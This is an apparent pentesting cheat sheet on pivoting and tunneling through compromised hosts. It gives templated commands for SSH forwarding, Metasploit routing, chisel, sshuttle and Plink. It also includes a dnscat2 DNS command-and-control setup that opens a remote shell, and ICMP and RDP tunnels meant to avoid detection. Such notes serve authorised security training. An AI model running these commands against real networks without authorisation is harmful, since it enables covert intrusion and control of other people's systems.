Pivoting & Tunneling

Pivoting is moving to other networks through a compromised host to find multiple targets on different network segments and Tunneling is the obfuscation of our actions to avoid detection.

SSH

client: Where the ssh command is executed. server: Target of the ssh connection.

Allows a local client port to be mapped to another port on a certain target reachable by the server.

ssh -N -L <C_PORT>:<S_TRAGET_IP>:<S_TARGET_PORT> <S_USER>@<S_IP>

(possible to repeat multiple times -L for multiple ports)

Allows a local client port to be mapped to the server. That port will be used as a proxy socks, so packets passing through that port will leave from the server.

ssh -N -D <C_PORT> <S_USER>@<S_IP>

vim /etc/proxychains[4].conf
# socks4 127.0.0.1 <C_PORT>

sudo proxychains[4] <COMMAND>

(ex.. nmap, msfconsole)

Allows a port on the server to be mapped to another port on a target reachable by the client.

ssh -N -R <S_PORT>:<C_TRAGET_IP>:<C_TARGET_PORT> <S_USER>@<S_IP>

Allows a server port to be mapped to the client. That port will be used as a proxy socks, so packets passing through that port will leave from the client.

ssh -N -R <S_PORT> <S_USER>@<S_IP>

-N: Without the ability to execute remote commands. 0.0.0.0: All interface.

Metasploit

Pivoting only inside metasploit. Maps reaching other subnets via meterpreter sessions (via victim hosts).

 post/multi/manage/autoroute  # set network and session

route add <NETWORK> <SESSION>

Or, in Meterpreter:

run autoroute -s <NETWORK>

Pivoting for tools outside metasploit. Allows a local port to be mapped to metasploit. That port will be used as a proxy socks, so packets passing through that port will be handled by the route paths defined in metasploit.

# Set Route

auxiliary/server/socks_proxy   # set vSocks 4a or 5 and PORT

vim etc/proxychains[4].conf
# socks4 127.0.0.1 <PORT>

sudo proxychains[4] <COMMAND>

(ex. nmap)

In meterpreter you can define both a Local and a Remote port forwarding (see above ssh).

Local

portfwd add -l <C_PORT> -p <S_TARGET_PORT> -r <S_TRAGET_IP>

Remote

portfwd add -R -l <C_TARGET_PORT> -p <S_PORT> -L <C_TRAGET_IP>

Other

Simple Port Forwarding (single-host)

Define the listening port and the destination to rebroadcast to.

socat TCP4-LISTEN:<PORT>,fork TCP4:<TARGET_IP>:<TARGET_PORT>

Define the listening port and the destination to rebroadcast to. Requires administrator privileges.

netsh.exe interface portproxy add v4tov4 listenport=<S_PORT> listenaddress=0.0.0.0 connectport=<TARGET_PORT> connectaddress=<TARGET_IP>

To view

netsh.exe interface portproxy show v4tov4

sshutle

It allows you to define on the local machine routes to certain subnets reachable from a host, via an ssh tunnel to that host. It therefore eliminates the need to configure proxychains.

sudo sshuttle -r <USER>@<IP>:<PORT_SSH> <NETWORK>

<COMMAND_TO_NETWORK>

NO proxychains, but root on the SSH client and Python3 on the SSH server.

Plink

On Windows before OpenSSH, PuTTY and its command-line-only counterpart Plink were used. Plink has much of the functionality offered by ssh.

plink.exe -ssh -R <PORT>:<IP>:<PORT> <USER>@<IP>

plink.exe -ssh -D 9050 <USER>@<IP>

Download Proxifier, portable version (like proxychains but for windows).

Set new proxy server socks5 to 127.0.0.1:9050

<COMMAND>

If we cannot interact with the running shell:

-pw # specify password from command

cmd.exe /c echo y | plink.exe -ssh ... # via piping

Tunneling

chisel

It performs TCP/UDP pivoting and tunneling, transported over HTTP and encrypted internally via SSH. Being hidden under HTTP it can bypass some restrictions.

On Attacker

chisel server -p <PORT> --reverse --socks5

On Target

chisel client <SERVER_IP:PORT> <REMOTE> [<REMOTE>]

<REMOTE>:

<C_IP>:<C_PORT>:<S_TARGET_IP>:<S_TARGET_PORT>

R:<S_IP>:<S_PORT>:<C_TARGET_IP>:<C_TARGET_PORT>

[R:]<PORT>:<PORT>

[R:]<PORT>:socks

Add the port in proxychains

vim /etc/proxychains[4].conf
socks5 127.0.0.1 <PORT>

proxychains[4] <COMMAND>

dnscat2

DNS-based encrypted command-and-control channel. A dnscat2 server runs on an authoritative name server for a particular domain (or as in our case a dummy dns server is created) while the client, configured to run queries on that domain, runs on the compromised machine.

On Attacker (Server)

sudo apt install dnscat2

sudo dnscat2-server --dns host=<IP>,port=53,domain=<DOMAIN>
# Memorize secret <SECRET>

On Target (Client)

Download compiled from HERE

./dnscat --dns server=<IP>,port=53,domain=<DOMAIN> --secret=<SECRET>

Or with Windows PowerShell Script

Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <IP> -Domain <DOMAIN> -PreSharedSecret <SECRET> -Exec cmd

Once connected, from Attacker

?     
<COMMAND> --help
windows         # see connections ID
window -i <ID>  # shell

ptunnel-ng

Communication channel encapsulated in ICMP packets. Requires administrator privileges.

Installation

.exe for Windows HERE

git clone https://github.com/utoni/ptunnel-ng.git && cd ptunnel-ng
sudo ./autogen.sh
cd src

On Target (Server)

sudo ./ptunnel-ng -r<SERVER_IP> -R22

On Attacker (Client)

sudo ./ptunnel-ng -p<SERVER_IP> -l2222 -r<SERVER_IP> -R22

ssh -p2222 -l<USER> <IP>

ssh -D 9050 -p2222 -l<USER> 127.0.0.1

vim /etc/proxychains[4].conf
# socks4 127.0.0.1 9050

sudo proxychains[4] <COMMAND> 
sudo proxychains[4] nmap <TARGET_IP_FROM_SERVER>

SocksOverRDP

Allows tunnelling and pivoting between Windows systems via RDP. Requires administrator privileges.

On Attacker (Client), with System PowerShell

regsvr32.exe SocksOverRDP-Plugin.dll

mstsc.exe # Connect on target1

Download Proxifier, portable version (like proxychains but for windows).

Set new proxy server socks5 to 127.0.0.1:1080

On Target1, with System PowerShell

SocksOverRDP-Server.exe

On Attacker

mstsc.exe # Connect on target1 via Target1 pivoting

Warning

With proxychains only full TCP connect scan (nmap -sT)
Windows Defender blocks ICMP, traditional ping (nmap -Pn)

Last updated 3 months ago